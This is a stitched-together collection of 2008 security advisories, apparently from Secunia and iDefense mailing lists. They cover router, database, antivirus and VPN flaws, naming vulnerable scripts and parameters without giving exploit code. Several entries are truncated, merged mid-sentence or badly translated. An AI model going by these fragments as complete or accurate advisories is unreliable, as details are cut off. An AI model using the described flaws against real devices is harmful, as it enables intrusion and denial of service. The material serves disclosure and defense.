electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Multiple buffer overflows in the web interface on the D-Link DI-524 router allow remote attackers to cause a denial of service (device crash) or possibly have unspecified other impact via (1) a long username or (2) an HTTP header with a large name and an empty value. (1) Excessively long username (2) Have an overly large name and a blank value HTTP header. D-Link is an internationally renowned provider of network equipment and solutions, and its products include a variety of router equipment.  D-Link DI-524 has multiple vulnerabilities in processing user requests. Remote attackers may use these vulnerabilities to make device services unavailable or perform cross-site scripting attacks.  The D-Link DI-524 router does not properly handle the login request sent to the web interface. collapse.  The D-Link DI-604 router did not properly filter the input passed to the rf parameter in prim.htm and returned it to the user, which could cause arbitrary HTML and script code to be executed in the user's browser session.  The D-Link DSL-G604T router did not properly filter the input passed to the var: category parameter in cgi-bin / webcm and returned it to the user, which could cause arbitrary HTML and script code to be executed in the user's browser session. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. D-Link is a network company founded by Taiwan D-Link Group, dedicated to the R&D, production and marketing of LAN, broadband network, wireless network, voice network and related network equipment. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: D-Link DI-524 Denial of Service Vulnerabilities SECUNIA ADVISORY ID: SA29366 VERIFY ADVISORY: http://secunia.com/advisories/29366/ CRITICAL: Less critical IMPACT: DoS WHERE: >From local network OPERATING SYSTEM: D-Link DI-524 http://secunia.com/product/8028/ DESCRIPTION: laurent has reported two vulnerabilities in D-Link DI-524, which can be exploited by malicious people to cause a DoS (Denial of Service). SOLUTION: Restrict access to trusted users only. PROVIDED AND/OR DISCOVERED BY: laurent ORIGINAL ADVISORY: http://www.gnucitizen.org/projects/router-hacking-challenge/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

sdbstarter in SAP MaxDB 7.6.0.37, and possibly other versions, allows local users to execute arbitrary commands by using unspecified environment variables to modify configuration settings. SAP MaxDB is prone to a local privilege-escalation vulnerability. Exploiting this issue allows local attackers to execute arbitrary code with superuser privileges. This will lead to the complete compromise of an affected computer. This issue affects MaxDB 7.6.0.37 on both Linux and Solaris platforms. Other UNIX variants are most likely affected. Microsoft Windows versions are not vulnerable to this issue. iDefense Security Advisory 03.10.08 http://labs.idefense.com/intelligence/vulnerabilities/ Mar 10, 2008 I. BACKGROUND SAP's MaxDB is a database software product. MaxDB was released as open source from version 7.5 up to version 7.6.00. Later versions are no longer open source but are available for download from the SAP SDN website (sdn.sap.com) as a community edition with free community support for public use beyond the scope of SAP applications. The "sdbstarter" program is set-uid root and installed by default. For more information, visit the product's website at the following URL. https://www.sdn.sap.com/irj/sdn/maxdb II. DESCRIPTION Local exploitation of a design error in the "sdbstarter" program, as distributed with SAP AG's MaxDB, could allow attackers to elevate privileges to root. This vulnerability exists due to a design error in the handling of certain environment variables. These variables are used to specify the configuration settings to be used by various MaxDB components. III. To exploit this vulnerability, an attacker must be able to execute the "sdbstarter" program. In a default installation, this requires that the attacker be a member of the "sdba" group. It is important to note that this vulnerability is not architecture dependent. IV. DETECTION iDefense has confirmed the existence of this vulnerability in SAP AG's MaxDB version 7.6.0.37 on both Linux and Solaris. Windows releases do not include the "sdbstarter" program. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE SAP AG has addressed this vulnerability by releasing a new version of MaxDB. For more information, consult SAP note 1140135. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0306 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/05/2007 Initial vendor notification 12/06/2007 Initial vendor response 03/10/2008 Coordinated public disclosure IX. CREDIT This vulnerability was discovered by Joshua J. Drake of VeriSign iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: MaxDB Multiple Vulnerabilities SECUNIA ADVISORY ID: SA29312 VERIFY ADVISORY: http://secunia.com/advisories/29312/ CRITICAL: Highly critical IMPACT: Privilege escalation, System access WHERE: >From remote SOFTWARE: MaxDB 7.x http://secunia.com/product/4012/ DESCRIPTION: Some vulnerabilities have been reported in MaxDB, which can be exploited by malicious, local users to gain escalated privileges, and by malicious people to potentially compromise a vulnerable system. 1) A signedness error within the "vserver" component can be exploited to cause a heap corruption via a specially crafted packet sent to the port, which "vserver" is listening on (port 7210/TCP by default). PROVIDED AND/OR DISCOVERED BY: An anonymous researcher, reported via iDefense. ORIGINAL ADVISORY: iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=670 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=669 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor

The control panel on the Belkin F5D7230-4 router with firmware 9.01.10 maintains authentication state by IP address, which allows remote attackers to bypass authentication by establishing a session from a source IP address of a previously authenticated user, a different vulnerability than CVE-2005-3802. Attackers can exploit this issue to gain access to affected routers using the account of a previously authenticated user. Belkin F5D7230-4 running firmware 9.01.10 is vulnerable; other devices and firmware versions may also be affected. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Belkin Wireless G Router Security Bypass and Denial of Service SECUNIA ADVISORY ID: SA29345 VERIFY ADVISORY: http://secunia.com/advisories/29345/ CRITICAL: Less critical IMPACT: Security Bypass, DoS WHERE: >From local network OPERATING SYSTEM: Belkin Wireless G Router http://secunia.com/product/6130/ DESCRIPTION: Some security issues and a vulnerability have been reported in the Belkin Wireless G Router, which can be exploited by malicious people to bypass certain security restrictions or cause a DoS (Denial of Service). 2) An error exists within the enforcing of permissions in cgi-bin/setup_dns.exe. This can be exploited to perform restricted administrative actions by directly accessing the vulnerable script. 3) An error exists in the cgi-bin/setup_virtualserver.exe script when processing HTTP POST data. This can be exploited to deny further administrative access to an affected device via specially a crafted HTTP POST request with a "Connection: Keep-Alive" header. The security issues and the vulnerability are reported in model F5D7230-4, firmware version 9.01.10. SOLUTION: Restrict network access to the router's web interface. PROVIDED AND/OR DISCOVERED BY: loftgaia ORIGINAL ADVISORY: http://www.gnucitizen.org/projects/router-hacking-challenge/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

cp06_wifi_m_nocifr.cgi in the admin panel on the Alice Gate 2 Plus Wi-Fi router does not verify authentication credentials, which allows remote attackers to disable Wi-Fi encryption via a certain request. Alice Gate2 Plus Wi-Fi is prone to a remote security vulnerability

The cpoint.sys driver in Panda Internet Security 2008 and Antivirus+ Firewall 2008 allows local users to cause a denial of service (system crash or kernel panic), overwrite memory, or execute arbitrary code via a crafted IOCTL request that triggers an out-of-bounds write of kernel memory. Panda Internet Security/Antivirus+Firewall 2008 is prone to a vulnerability that allows local attackers to corrupt kernel memory. This vulnerability occurs because the application fails to sufficiently validate IOCTL requests. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Panda Products cpoint.sys Privilege Escalation Vulnerabilities SECUNIA ADVISORY ID: SA29311 VERIFY ADVISORY: http://secunia.com/advisories/29311/ CRITICAL: Less critical IMPACT: Privilege escalation, DoS WHERE: Local system SOFTWARE: Panda Internet Security 2008 http://secunia.com/product/17681/ Panda Antivirus + Firewall 2008 http://secunia.com/product/17905/ DESCRIPTION: Tobias Klein has reported some vulnerabilities in Panda products, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or gain escalated privileges. Input validation errors in the cpoint.sys driver when handling certain IOCTL requests (e.g. The vulnerabilities affect the following products: * Panda Internet Security 2008 * Panda Antivirus + Firewall 2008 SOLUTION: Apply hotfix. Panda Internet Security 2008 (hfp120801s1.exe): http://www.pandasecurity.com/resources/sop/Platinum2008/hfp120801s1.exe Panda Antivirus + Firewall 2008 (hft70801s1.exe): http://www.pandasecurity.com/resources/sop/PAVF08/hft70801s1.exe PROVIDED AND/OR DISCOVERED BY: Tobias Klein ORIGINAL ADVISORY: Panda: http://www.pandasecurity.com/homeusers/support/card?id=41337&idIdioma=2&ref=ProdExp http://www.pandasecurity.com/homeusers/support/card?id=41231&idIdioma=2&ref=ProdExp http://www.trapkit.de/advisories/TKADV2008-001.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple unspecified vulnerabilities in Fujitsu Interstage Smart Repository, as used in multiple Fujitsu Interstage products, allow remote attackers to cause a denial of service (daemon crash) via (1) an invalid request or (2) a large amount of data sent to the registered attribute value. Fujitsu Interstage Product Fujitsu Intersatage Smart The repository contains service disruptions ( daemon crash ) There is a vulnerability that becomes a condition.Service disruption by a third party via: ( Daemon crash ) There is a possibility of being put into a state. Remote attackers can exploit these issues to deny service to legitimate users. Currently, very little is known about these issues. We will update this BID as more information emerges. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Fujitsu Interstage Smart Repository Denial of Service Vulnerabilities SECUNIA ADVISORY ID: SA29250 VERIFY ADVISORY: http://secunia.com/advisories/29250/ CRITICAL: Less critical IMPACT: DoS WHERE: >From local network SOFTWARE: Interstage Job Workload Server 8.x http://secunia.com/product/13686/ Interstage Apworks 8.x http://secunia.com/product/15987/ Interstage Apworks 7.x http://secunia.com/product/13689/ Interstage Application Server 8.x http://secunia.com/product/13685/ Interstage Application Server 7.x http://secunia.com/product/13692/ Interstage Business Application Server 8.x http://secunia.com/product/13687/ DESCRIPTION: Some vulnerabilities have been reported in various Fujitsu products, which can be exploited by malicious people to cause a DoS (Denial of Service). sending incorrect requests or sending overly large data. Please see the vendor's advisory for a list of affected products and versions. SOLUTION: Please see the vendor's advisory for patch details. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.fujitsu.com/global/support/software/security/products-f/interstage-sr-200801e.html http://www.fujitsu.com/global/support/software/security/products-f/interstage-sr-200802e.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-site scripting (XSS) vulnerability in the login page in Check Point VPN-1 UTM Edge W Embedded NGX 7.0.48x allows remote attackers to inject arbitrary web script or HTML via the user parameter. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The issue affects Check Point VPN-1 UTM Edge firmware 7.0.48x. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Input passed to the "user" parameter in the login page is not properly sanitised before being returned to the user. Other versions may also be affected. SOLUTION: Update to firmware version 7.5.48. PROVIDED AND/OR DISCOVERED BY: Henri Lindberg, Louhi Networks ORIGINAL ADVISORY: http://www.louhi.fi/advisory/checkpoint_080306.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------